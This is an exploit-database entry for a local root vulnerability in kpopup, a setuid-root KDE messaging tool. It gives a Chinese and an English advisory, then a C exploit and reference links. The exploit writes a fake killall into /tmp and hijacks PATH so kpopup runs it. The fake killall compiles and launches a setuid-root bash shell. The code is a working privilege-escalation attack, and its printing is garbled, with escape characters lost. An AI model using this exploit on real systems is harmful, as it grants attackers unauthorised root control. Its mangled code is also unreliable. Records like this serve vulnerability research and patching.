https://www.exploit-db.com/exploits/23308
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-362

Kpopup是一款KDE程序，用于发送和接收MSWindowsWinPopup消息的程序。Kpopup程序使用不安全的system(3)调用外部工具，本地攻击者可以利用这个漏洞以root用户权限在系统上执行任意命令。Kpopup程序依靠PATH环境变量不安全的使用system()函数来调用killall(1)程序，当执行Kpopup时如果设置环境变量，就可能导致恶意的伪造的killall(1)程序执行。许多目前的SHELL会阻止通过setuid/setgid进程使用这些函数，而且如果进程不匹配进程的实际userid/gid就会丢弃权限。kpopup可能是在调用system前首先设置实际uid和gid为0而导致了安全问题。

source: http://www.securityfocus.com/bid/8915/info

It has been alleged that it is possible for local attackers to gain root privileges through kpopup, which is is installed setuid root by default. According to the report, kpopup uses the system(3) C-library function insecurely to run other utilities on the system. In at least one instance, system(3) is called to invoke the binary killall(1) in a manner relying on the PATH environment variable. As the environment can be set by the unprivileged user when kpopup is executed, an arbitrary executable with the filename killall(1) can be executed. Many modern shells anticipate insecure use of this function by setuid/setgid processes and drop effective privileges if they do not match the real userid/gid of the process. It may be the case that kpopup first sets its real uid and gid to 0 before calling system, making this vulnerability exploitable. This has not been confirmed by Symantec. 

/*Local root exploit for kpopup
 *by b0f www.b0f.net
 */
#include <stdio.h>
int main()
{
setenv("PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:
/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:");
FILE *fd;
fd = fopen("/tmp/killall", "w");{
fprintf(fd, "#!/bin/shn");
fprintf(fd, "cd /tmpn");
fprintf(fd, "/bin/cat > shell.c << EOFn");
fprintf(fd, "#include <stdio.h>n");
fprintf(fd, "int main()n");
fprintf(fd, "{n");
fprintf(fd, "setuid(0);n");
fprintf(fd, "setgid(0);n");
fprintf(fd, "execl("/bin/bash", "-bash", NULL);n");
fprintf(fd, "return 0;n");
fprintf(fd, "}n");
fprintf(fd, "EOFn");
fprintf(fd, "/usr/bin/gcc /tmp/shell.c -o /tmp/shelln");
fprintf(fd, "/bin/chown root.root /tmp/shelln");
fprintf(fd, "/bin/chmod 6711 /tmp/shelln");
fprintf(fd, "echo NOW HERE IS YOUR ROOT SHELLn");
fprintf(fd, "/tmp/shelln");
fclose(fd);
system("chmod +x /tmp/killall");
system("/usr/local/kde/bin/kpopup root shell");
return 0;
}
}

来源:BID
名称:8915
链接:http://www.securityfocus.com/bid/8915
来源:OSVDB
名称:2742
链接:http://www.osvdb.org/2742
来源:SECUNIA
名称:10105
链接:http://secunia.com/advisories/10105
来源:XF
名称:kpopup-systemcall-execute-code(13540)
链接:http://xforce.iss.net/xforce/xfdb/13540
来源:BUGTRAQ
名称:20031028Localrootvulninkpopup
链接:http://www.securityfocus.com/archive/1/342736
来源：NSFOCUS
名称：5600
链接：http://www.nsfocus.net/vulndb/5600